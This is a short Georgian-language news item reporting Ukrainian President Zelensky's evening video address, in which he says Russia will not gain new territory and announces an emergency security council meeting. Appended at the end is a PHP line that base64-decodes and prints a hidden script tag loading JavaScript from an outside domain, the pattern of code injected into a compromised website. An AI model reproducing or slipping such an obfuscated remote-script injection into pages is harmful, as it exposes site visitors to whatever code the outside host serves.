celsiusi
ავერსი შნაიდერი
რუსეთი უკრაინის ახალ ტერიტორიას ვერ მიიღებს - ამის შესახებ უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ საღამოს ვიდეომიმართვაში ისაუბრა.  
 
ზელენსკი რუსებს აფრთხილებს, რომ თუ სურთ ღირსეული ცხოვრება, ამის ერთადერთი გზა არსებობს და ამისთვის "უნდა შეჩერდეს ის, ვისაც ომი სიცოცხლეზე მეტად სურს".
 
"რუსეთი შეუერთდება იმ კატასტროფას, რომელიც მან მოიტანა ჩვენი ქვეყნის ოკუპირებულ ტერიტორიაზე. ფასი იმისა, რომ რუსეთში ერთ ადამიანს სურს ამ ომის გაგრძელება, ნიშნავს, რომ მთელი რუსული საზოგადოება დარჩება ნორმალური ეკონომიკის, ღირსეული ცხოვრებისა და ყოველგვარი ადამიანური ღირებულებების გარეშე. ამის შეჩერება მაინც შეიძლება. მაგრამ მის შესაჩერებლად, რუსეთში უნდა შეჩერდეს ის, ვისაც ომი სიცოცხლეზე მეტად სურს. თქვენი ცხოვრება, რუსეთის მოქალაქეებო.
 
ხვალ ჩვენი ბრძოლის კიდევ ერთი დღეა, კიდევ ერთი დღე გამარჯვების გზაზე. იქნება ეს ჩვენთვის განსაკუთრებული? ეს დღე იქნება კიდევ ერთი ნაბიჯი, რომელიც დაგვაახლოებს უსაფრთხოებასა და მშვიდობას. ჩვენი ტერიტორიული მთლიანობის აღსადგენად. იმიტომ რომ მილიონობით უკრაინელი იბრძვის და მუშაობს ამისთვის.ეროვნული უსაფრთხოების საბჭოს რიგგარეშე სხდომა, რომელიც მე მოვიწვიე, ხვალ გაიმართება. იქნება გადაწყვეტილებები. ჩვენ ვიცით, როგორ ვუპასუხოთ რუსეთის ნებისმიერ ქმედებას",- ამბობს ზელენსკი. 
450
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");